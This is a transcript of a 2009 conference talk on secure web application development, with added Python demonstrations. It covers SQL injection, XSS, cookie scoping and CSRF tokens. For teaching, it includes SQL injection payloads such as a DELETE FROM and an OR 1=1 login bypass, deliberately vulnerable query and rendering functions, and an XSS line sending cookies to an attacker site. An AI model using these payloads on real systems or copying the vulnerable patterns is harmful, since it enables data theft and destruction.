Published by Maurice Bennett. Modified over 9 years ago.
Twin Cities Java User Group
Introduction to Writing Secure Web Applications
March 9th, 2009
Jason Dean, Minnesota Department of Health
Who am I?
- Web Application Developer with the Minnesota Department of Health (MDH)
- Chairperson and User Group Manager of the MDH ColdFusion User Group
- Web Development Blogger (http://www.12robots.com)
- Veteran of the U.S. Coast Guard
What is Application Security?
Measures taken to prevent the exploitation of an application, or of the system that runs it, through defects in the design, development or deployment of the application.
How do I know if my application is secure? If you have to ask, then it is not.
Make my application secure?
Assets
- Flash Files
- Images
- Servers
- System Files
- Databases
- Configuration Files
Threats
The basics:
- Cross-Site Scripting (XSS)
- Cookie Misuse/Exploits
- SQL Injection
- Request Forgeries (on-site and cross-site)
- Input Validation Exploits
- File Uploads
The advanced:
- Session Management Attacks
- Authorization/Authentication
- Access Control Attacks
- Parameter Manipulation
The less obvious:
- Ignorance
- Assumptions
- Laziness
- Internal threats
Discover Vulnerabilities
- Code Review
- Scanners
- Release Source
- Attack
- Experts
Countermeasures
Countermeasures mitigate attacks.
- Out-Of-The-Box
- Custom
- Test and Retest
- Do not touch
- Certify
What are we going to talk about?
The basic:
- SQL Injection
- Cross-Site Scripting (XSS)
- Cookies
- Request Forgeries
The less obvious:
- Ignorance
- Assumptions
- Laziness
Ignorance
"A long habit of not thinking a thing wrong gives it a superficial appearance of being right." - Thomas Paine
Assumptions about users
"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." - Albert Einstein
Assumptions About Hackers
Why would a hacker have any interest in your site?
- Vandalism
- Identity Theft
- Activism
Hackers will not use your site as you intend, either.
Assumptions about administrator/host
- Configured correctly?
- Settings enabled?
- Work together to review configuration
- Control at the application level
- Hire an Expert
Assumptions about how the server/environment work
- Secret URLs
- Firewall
- Google
- Web Server Logs
- Internal Traffic
- Hidden Fields
- JavaScript
Laziness
- Security Testing
- Code Review
- Learning
Too hard, too much research, don't have enough time?
The Basic Threats
- SQL Injection
- Cross-Site Scripting (XSS)
- Cookie Misuse/Exploits
- Request Forgeries
SQL Injection
- Obtain, change or destroy data
- Execute system commands
- Easy to do
- Easy to stop
- Any DBMS
SQL Injection Examples
URL, form and cookie parameters can all end up as part of a SQL statement. A URL like

http://www.12robots.com/?userid=1303

would probably be used in a query like this:

String query = "SELECT * FROM users WHERE userid = " + userid;
SQL Injection Examples (cont)
www.12robots.com/?userid=1303
would become
http://www.12robots.com/?userid=1303;+DELETE+FROM+users;--
which would result in this query:
SELECT username, firstname FROM users WHERE userid = 1303; DELETE FROM users;--
The trailing -- turns whatever the application appended after the parameter into a comment. Whether the second statement actually runs depends on the database driver accepting more than one statement per call; the OR 1=1 form on the next slide needs no such support.
SQL Injection Examples (cont)
http://www.12robots.com/?userid=1303%20OR%201=1;--
would result in this query, which returns every row in the table:
SELECT username, firstname FROM users WHERE userid = 1303 OR 1=1;--
Stopping SQL Injection Example
So if you had a URL for login that looked like
http://www.12robots.com/?username=Jason&password=myPass
(I know we don't send passwords in the URL; this is a demo, and it would work just as well in a form field)
and a hacker tried to inject a single quote and a double-dash:
http://www.12robots.com/?username=Jason'--&password=noPass
If you did not have a parameterized query, you'd get hacked. The password check is commented out of the statement:
SELECT username, firstname FROM users WHERE username = 'jason'-- ' AND password = 'myPass'
But with a parameterized query, you'd be safe. The injected value reaches the database as one string literal, equivalent to the escaped form below, and the password check still runs:
SELECT username, firstname FROM users WHERE username = 'jason''-- ' AND password = 'myPass'
Prepared Statements in Action: ColdFusion
The cfqueryparam tags did not survive extraction; the standard syntax is restored here, with the variable names (url.userid, url.username) assumed.
On an integer:
SELECT username, firstname FROM users WHERE userid = <cfqueryparam value="#url.userid#" cfsqltype="cf_sql_integer">
Or on a string:
SELECT username, firstname FROM users WHERE username = <cfqueryparam value="#url.username#" cfsqltype="cf_sql_varchar">
Prepared Statements in Action: Java
Prepare a string:
String query = "SELECT id, fname, lname FROM authors WHERE fname = ? AND lname = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, fname);
pstmt.setString(2, lname);
ResultSet results = pstmt.executeQuery();   // execute() returns a boolean, not a ResultSet

Prepare an integer:
String query = "SELECT id, fname, lname FROM authors WHERE id = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setInt(1, id);
ResultSet results = pstmt.executeQuery();
Prepared Statements in Action: C#
Prepare a string:
IDbCommand cmdUserInputText = conn.CreateCommand();
cmdUserInputText.CommandType = System.Data.CommandType.Text;
cmdUserInputText.CommandText = "SELECT * FROM titles WHERE title_id=@title_id";
IDbDataParameter userParam = cmdUserInputText.CreateParameter();
userParam.ParameterName = "@title_id";   // must match the placeholder in CommandText
userParam.Value = "myTitleID";
userParam.DbType = System.Data.DbType.String;
cmdUserInputText.Parameters.Add(userParam);
IDataReader reader = cmdUserInputText.ExecuteReader();
Prepared Statements in Action: PHP with MySQLi
Prepare an integer:
$db_conn = new mysqli("localhost", "user", "pass", "db");
$statement = $db_conn->prepare("SELECT username FROM users WHERE id = ?");
$statement->bind_param("i", $id);
$statement->execute();

Prepare a string:
$db_conn = new mysqli("localhost", "user", "pass", "db");
$statement = $db_conn->prepare("SELECT id FROM users WHERE username = ?");
$statement->bind_param("s", $username);
$statement->execute();
What about other Dynamic Elements in SQL?
Parameters can only stand in for values, not for keywords or identifiers, so a sort direction cannot be bound:
SELECT username, firstname FROM users ORDER BY username #sortOrder#
Instead, compare the input against a fixed list of allowed values and only ever place one of those constants into the statement:
SELECT username, firstname FROM users ORDER BY username ASC
SELECT username, firstname FROM users ORDER BY username DESC
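The three attacks from the preceding slides (the OR 1=1 lookup, the 'jason'-- login bypass and the ORDER BY direction) run against a constructed in-memory SQLite table, once through string concatenation and once through parameters. This is an added Python example, not the talk's Java or ColdFusion code; the table layout, the sample rows and the function names are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data for the demo (not from the slides).
SAMPLE_USERS = [
    (1303, "jason", "Jason", "myPass"),
    (1304, "alice", "Alice", "s3cret"),
    (1305, "bob", "Bob", "hunter2"),
]


def make_db():
    """Build an in-memory SQLite database shaped like the slides' users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userid INTEGER, username TEXT, firstname TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user_vulnerable(conn, userid):
    """The slides' concatenated query: the raw parameter becomes SQL text."""
    query = "SELECT username, firstname FROM users WHERE userid = " + userid
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, userid):
    """Parameterized: the value travels to the engine separately from the SQL."""
    query = "SELECT username, firstname FROM users WHERE userid = ?"
    return conn.execute(query, (userid,)).fetchall()


def login_vulnerable(conn, username, password):
    """Concatenated login query; a quote plus '--' comments the password check out."""
    query = (
        "SELECT username, firstname FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterized login query; the quote and '--' are just characters in a literal."""
    query = "SELECT username, firstname FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Keywords and identifiers cannot be bound as parameters, so the sort order is
# mapped through an allow-list and only the constant from the list is ever
# spliced into the statement.
ALLOWED_SORT_ORDERS = {"ASC": "ASC", "DESC": "DESC"}


def list_users_sorted(conn, sort_order):
    order = ALLOWED_SORT_ORDERS.get(sort_order.strip().upper())
    if order is None:
        raise ValueError("sort order must be ASC or DESC")
    query = "SELECT username FROM users ORDER BY username " + order
    return conn.execute(query).fetchall()


def demo():
    """Run each attack against both versions and collect the results."""
    conn = make_db()
    results = {
        "lookup_normal": lookup_user_vulnerable(conn, "1303"),
        "lookup_or_1_1_vulnerable": len(lookup_user_vulnerable(conn, "1303 OR 1=1")),
        "lookup_or_1_1_safe": len(lookup_user_safe(conn, "1303 OR 1=1")),
        "login_bypass_vulnerable": login_vulnerable(conn, "jason'--", "noPass"),
        "login_bypass_safe": login_safe(conn, "jason'--", "noPass"),
        "login_real_safe": login_safe(conn, "jason", "myPass"),
        "sorted_desc": list_users_sorted(conn, "desc"),
    }
    try:
        list_users_sorted(conn, "ASC; DROP TABLE users")
        results["sort_injection_rejected"] = False
    except ValueError:
        results["sort_injection_rejected"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterized lookup returns no rows for "1303 OR 1=1" because the whole string is compared as one value against the integer column; the login bypass fails for the same reason. The ORDER BY case is the one parameters cannot cover, which is why the sort direction is looked up in a dictionary and the request is refused rather than sanitized when the value is not on the list.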
Cross-Site Scripting (XSS)
- Injection attack
- One user attacks another
- Many uses
- Any user input
- Usually JavaScript
XSS Example
You have a comments text box, like so: (the form markup on this slide did not survive extraction)
And some joker decides to inject some JavaScript into it: (the injected script did not survive extraction)
Then when someone views the page that displays that comment, their browser runs the script.
XSS Uses
For example, sending the victim's cookies to a site the attacker controls:
document.location = "http://www.evilsite.com?cookie=" + document.cookie;
XSS iFrame Example
The injected comment contains an iframe that imitates the site's login box. When another user views the output of that comment later, they will see a form prompting for their username and password; if they enter them and hit "submit", the form is posted to the evil site.
XSS Prevention
So how do we protect against this type of attack?
- Turn on script protection (ColdFusion)
- Use character encoding functions on all dynamic output
- Validate user input
- Use a security API or framework for your specific language
Character Encoding
This:
<script type="text/javascript">alert('Hacked!');</script>
would become:
&lt;script type=&quot;text/javascript&quot;&gt;alert('Hacked!');&lt;/script&gt;
and the browser displays the script as text instead of running it.

Likewise, this:
This is <strong>Bold Text</strong>
would become:
This is &lt;strong&gt;Bold Text&lt;/strong&gt;
and when displayed the reader sees the literal tags, "This is <strong>Bold Text</strong>", instead of bold text.
Character Encoding Functions
ColdFusion: #HTMLEditFormat(String)#
Java (jTidy): import org.w3c.tidy.servlet.util.HTMLEncode; HTMLEncode.encode(String);
Java (ESAPI): ESAPI.encoder().encodeForHTML(String);
PHP: htmlspecialchars($string)   (the slide's PHP entry did not survive extraction; this is PHP's standard HTML-escaping function)
C#: Server.HtmlEncode(String);
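A hand-written encoder for the five HTML metacharacters, applied to the slides' comment example at output time, with a vulnerable and an encoded renderer side by side. This is an added Python example, not the encoder from any of the libraries listed above; the comment markup and the helper names are assumptions, and the "live tag" check is a deliberately crude stand-in for a browser parsing the page.

```python
import html

# The characters that let user data change how the browser parses the page.
HTML_ENCODE_MAP = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def encode_for_html(text):
    """Entity-encode the HTML metacharacters so the text is displayed, not parsed."""
    return "".join(HTML_ENCODE_MAP.get(ch, ch) for ch in text)


def matches_stdlib(text):
    """Self-check: the hand-written encoder agrees with Python's html.escape()."""
    return encode_for_html(text) == html.escape(text, quote=True)


def render_comment_vulnerable(comment):
    """Splices the stored comment straight into the page: the slides' broken case."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """Encodes on output, so whatever was stored is shown as text."""
    return '<div class="comment">' + encode_for_html(comment) + "</div>"


def contains_live_tag(rendered):
    """Crude stand-in for the browser: is there a <script> tag left to execute?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    # Constructed comment, taken from the slide's alert example.
    comment = "<script type=\"text/javascript\">alert('Hacked!');</script>"
    print(render_comment_vulnerable(comment))
    print(render_comment_safe(comment))
```

Encoding happens when the comment is written into the page, not when it is stored; stored data is reused in other contexts (e-mail, JSON, logs) that need different encodings. The five-character map is the right set for text placed between HTML tags; a value placed inside a JavaScript string or a URL needs the encoder for that context instead.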
Cookie Security
Cookie Parameters
- Name
- Value
- Expires
- Path
- Domain
- Secure
- HTTPOnly
Cookie Domain and Path
Domain: if 12robots.awesomebloggers.com sets a cookie with domain=".awesomebloggers.com", the browser also sends it to www.awesomebloggers.com and to hacker.awesomebloggers.com. With domain=".12robots.awesomebloggers.com" it is sent only to that host and its subdomains.
Path: if www.awesomebloggers.com/12robots sets a cookie with path="/", the browser also sends it to www.awesomebloggers.com/hacker. With path="/12robots" it is sent only to requests under /12robots.
Scope the domain and path as narrowly as the application allows.
Setting the HTTPOnly Flag
(The slide's ColdFusion and PHP snippets did not survive extraction; the standard calls are given here.)
ColdFusion (write the header directly):
<cfheader name="Set-Cookie" value="name=value; HttpOnly">
Java (Servlet 2.5 has no setHttpOnly(), so write the header directly):
response.setHeader("Set-Cookie", "name=value; HttpOnly");
PHP (the seventh argument of setcookie):
setcookie("name", "value", 0, "/", "", false, true);
C#:
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);
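To make the domain and path rules from the previous slide concrete, and to tie them to the Secure and HttpOnly attributes on this one, the following added Python example models the browser's decision of whether a cookie accompanies a request (RFC 6265 domain and path matching) and serialises a cookie into a Set-Cookie header value. It is not code from the talk; the Cookie class, the function names and the awesomebloggers.com scenarios are assumptions built from the slides' host names.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None   # None: host-only, returned just to the host that set it
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def domain_matches(request_host, cookie_domain):
    """RFC 6265 domain matching; a leading dot on the Domain attribute is ignored."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


def path_matches(request_path, cookie_path):
    """RFC 6265 path matching: /12robots covers /12robots/x but not /12robotsx."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    if cookie_path.endswith("/"):
        return True
    return request_path[len(cookie_path)] == "/"


def accepted_by_browser(cookie, setting_host):
    """A browser drops a cookie whose Domain does not cover the host setting it."""
    return cookie.domain is None or domain_matches(setting_host, cookie.domain)


def is_sent(cookie, setting_host, request_host, request_path, https):
    """Would the browser attach this cookie to a request for request_host/request_path?"""
    if cookie.domain is None:
        if request_host.lower() != setting_host.lower():
            return False
    elif not domain_matches(request_host, cookie.domain):
        return False
    if not path_matches(request_path, cookie.path):
        return False
    if cookie.secure and not https:
        return False
    return True


def set_cookie_header(cookie):
    """Serialise the cookie as the value of a Set-Cookie response header."""
    parts = [f"{cookie.name}={cookie.value}", f"Path={cookie.path}"]
    if cookie.domain is not None:
        parts.append(f"Domain={cookie.domain}")
    if cookie.secure:
        parts.append("Secure")
    if cookie.httponly:
        parts.append("HttpOnly")
    return "; ".join(parts)


if __name__ == "__main__":
    # Constructed scenario from the slides: a blog hosted under a shared domain.
    broad = Cookie("session", "abc123", domain=".awesomebloggers.com")
    narrow = Cookie("session", "abc123", domain=".12robots.awesomebloggers.com")
    for c in (broad, narrow):
        print(set_cookie_header(c), "->", "sent to hacker.awesomebloggers.com" if
              is_sent(c, "12robots.awesomebloggers.com", "hacker.awesomebloggers.com", "/", True)
              else "not sent to hacker.awesomebloggers.com")
```

Note that HttpOnly plays no part in is_sent: it controls whether document.cookie can read the value (which is what the XSS cookie-theft snippet relied on), not whether the browser transmits it. Secure, by contrast, does affect transmission and is what keeps a session cookie off plain HTTP.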
What is a Request Forgery?
A request forgery, also called a Cross-Site (or On-Site) Request Forgery (XSRF or CSRF), is an attack perpetrated against a user who has authenticated access to the site: the attacker causes the victim's browser to send a request the victim never intended, and the site accepts it because the victim's session cookie travels with it.
That was confusing. How about an example?
- A delete page/function
- A single parameter: PageID
- Admin only
All is good, right?
What happened?
So what can we do about it?
The delete page probably:
- Receives the request
- Checks to make sure the user is logged in
- Confirms that the ID is valid
- Performs the action
Nothing on that list shows that the admin meant to send this request rather than being tricked into sending it; the login check passes because the browser sent the admin's cookie.
How do we fix it?
When the form is rendered, generate a one-time key, store it in the session with an expiry, and put the same key in the form as a hidden field:
// pseudo-code
session.add("key", createUUID());
session.add("keyExpires", DateAdd("n", 10, Now()));   // "n" is minutes in ColdFusion's DateAdd; "m" would add months
How do we fix it?
Pseudo-code for the page that processes the request:
if (exists(sessionKey) && exists(formKey) && !isExpired(keyExpires) && sessionKey == formKey) {
    // Delete the key from the session so it can't be reused
    delete(sessionKey);
} else {
    // Reject the request if the key is missing, expired or doesn't match
    log(securityInfo);
    request.location(webroot);   // or throw an Exception
}
// Finish processing the request
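The two pseudo-code slides above, carried through as working Python: a key is issued into the session when the delete form is rendered, and the processing page validates and burns it before acting. This is an added example, not the talk's ColdFusion code; the session is a plain dict, the form is a dict, and the ten-minute lifetime follows the slides. The key is compared in constant time and removed from the session whether or not it matched, so a wrong guess cannot be retried against the same key.

```python
import hmac
import secrets
import time

KEY_TTL_SECONDS = 10 * 60   # ten minutes, as on the slides
SESSION_KEY = "key"
SESSION_EXPIRES = "keyExpires"


def issue_key(session, now=None):
    """Generate a fresh one-time key, store it in the session and return it for the form."""
    now = time.time() if now is None else now
    key = secrets.token_urlsafe(32)        # 256 bits from the OS CSPRNG
    session[SESSION_KEY] = key
    session[SESSION_EXPIRES] = now + KEY_TTL_SECONDS
    return key


def render_delete_form(session, page_id):
    """HTML for the admin's delete form, with the key in a hidden field.

    A cross-site attacker can make the victim's browser POST to /delete, but
    cannot read this page to learn the key, so the forged request fails.
    """
    key = issue_key(session)
    return (
        '<form method="post" action="/delete">'
        f'<input type="hidden" name="pageID" value="{int(page_id)}">'
        f'<input type="hidden" name="key" value="{key}">'
        '<input type="submit" value="Delete">'
        "</form>"
    )


def consume_key(session, form_key, now=None):
    """Validate the submitted key against the session and burn it either way."""
    now = time.time() if now is None else now
    expected = session.pop(SESSION_KEY, None)
    expires = session.pop(SESSION_EXPIRES, 0)
    if expected is None or form_key is None:
        return False
    if now > expires:
        return False
    # Constant-time comparison so timing does not leak how much of the key matched.
    return hmac.compare_digest(expected, form_key)


def handle_delete(session, form, is_admin, now=None):
    """The processing page: authorisation first, then the key check, then the action."""
    if not is_admin:
        return "forbidden"
    if not consume_key(session, form.get("key"), now):
        # The slides log securityInfo and relocate to the web root here.
        return "rejected"
    return f"deleted page {int(form['pageID'])}"


if __name__ == "__main__":
    session = {}
    print(render_delete_form(session, 42))
    print(handle_delete(session, {"pageID": "42", "key": session[SESSION_KEY]}, True))
    print(handle_delete(session, {"pageID": "42", "key": "guess"}, True))   # key already burned
```

The `now` parameter exists only so the expiry path can be exercised deterministically; production code calls it with the default. Because the key lives in the server-side session, the check also defeats the on-site variant, where the forged request comes from another page on the same domain.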
Questions?
Please ask your questions now. Comments?
Jason Dean
jason@12robots.com
http://www.12robots.com